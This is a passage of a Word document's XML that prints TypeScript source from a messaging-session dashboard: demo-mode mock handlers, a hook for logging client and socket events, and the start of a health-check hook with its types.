        <w:t xml:space="preserve">      const a = _args as { chatId?: string } | undefined</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      return demoMessages[a?.chatId || ""]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case "getProfilePicFromServer": return null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "isChatOnline": return Math.random() &gt; 0.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getLastSeen": return tsAgo(Math.floor(Math.random() * 120))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "checkNumberStatus": return { canReceiveMessage: true, numberExists: true }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getSessionId": return "my-session"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    case "getInstanceId": return "demo-instance"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    default: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apps/dashboard-neo/src/lib/demo/demo-data.ts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apps/dashboard-neo/src/lib/demo/use-demo.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useSearch } from "@tanstack/react-router"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whether the dashboard is running in demo mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Activated via ?demo=true in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * In demo mode, all data hooks return realistic mock data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * instead of making live socket/API calls.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function useDemo(): { isDemo: boolean } {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const search = useSearch({ from: "__root__" }) as { demo?: boolean }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  return { isDemo: search.demo === true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apps/dashboard-neo/src/lib/demo/use-demo.ts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apps/dashboard-neo/src/lib/hooks/use-events.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useState, useEffect, useCallback, useRef } from "react"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { getClient } from "@/lib/api-client"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useDemo } from "@/lib/demo/use-demo"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { demoEvents, demoEventDrips, type DemoEvent } from "@/lib/demo/demo-data"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EventLog = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  id: number</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  timestamp: string</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args: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MAX_EVENTS = 500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useEvents() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { isDemo } = useDemo()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [events, setEvents] = useState&lt;EventLog[]&gt;(isDemo ? demoEvents : [])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [paused, setPaused] = useState(false)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [filter, setFilter] = useState("")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const pausedRef = useRef(paused)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  pausedRef.current = paused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(typeof window === "undefined")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 mode — drip-feed events periodically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isDemo) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      let dripIdx = 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const interval = setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (pausedRef.current) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const drip = demoEventDrips[dripIdx % demoEventDrips.length]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        dripIdx++</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        setEvents((prev)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Date.now() + Math.random(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              timestamp: new Date().toLocaleTimeString(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              name: drip.name,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              args: drip.payload ? [drip.payload] : [],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            } satisfies DemoEvent,</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].slice(0, MAX_EVENTS),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3000 + Math.random() * 3000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      return () =&gt; clearInterval(interval)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mounted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client = await getClient()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (!mounted)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Use EventEmitter2 wildcard to capture ALL events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        client.ev.onAny((event: string | string[], ...args: unknown[]) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (!mounted || pausedRef.current) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          const eventName = Array.isArray(event) ? event.join('.') : event</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setEvents((prev)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Date.now() + Math.random(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                timestamp: new Date().toLocaleTimeString(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                name: eventName,</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].slice(0, MAX_EVENTS),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Also capture raw socket events for completeness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        client.socket.onAny((event: string, ...args: unknown[]) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (!mounted || pausedRef.current) return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          // Avoid duplicating events already captured via ev</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (event.startsWith("on") || event === "connect" || event === "disconnect") return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          setEvents((prev)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Date.now() + Math.random(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                timestamp: new Date().toLocaleTimeString(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                name: `socket:${event}`,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                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].slice(0, MAX_EVENTS),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 Not connected yet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mounted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clear = useCallback(() =&gt; setEvents([]),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filteredEvents = filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ? events.filter((e) =&gt; e.name.toLowerCase().includes(filter.toLowerCase()))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    :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events: filteredEvents,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    allEvents: events,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    paused,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    setPaused,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    setFilter,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    clear,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    count: events.length,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apps/dashboard-neo/src/lib/hooks/use-events.ts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apps/dashboard-neo/src/lib/hooks/use-health.ts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useHealth — fetches /health from the API server via REST.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Unlike socket-based hooks, this uses a simple HTTP fetch so the data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * survives page navigation. A module-level cache ensures that returning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * to the health page shows the last-known data immediately while a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * background refresh updates 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Polls every 10s while mounted.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useState, useEffect, useRef, useCallback } from "react"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { getApiUrl } from "@/lib/api-client"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useDemo } from "@/lib/demo/use-demo"</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demoLaunchTimeline,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  demoPatches,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  demoLicense,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  demoReconnections,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">} from "@/lib/demo/demo-data"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Types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TimelineStep {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  step: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  status: "done" | "failed"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  durationMs: number</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  details?: Record&lt;string, unknown&gt;</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PatchInfo {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  patchId: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required: boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  outcome: "applied" | "not_applicable" | "failed"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LicenseInfo {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  status: "valid" | "metadata_only" | "missing" | "invalid" | "expired"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  source: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  keyType: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  detail: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ReconnectionEntry {</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reason: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  downtimeMs: number</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  success: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HealthData {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  status: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  version: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
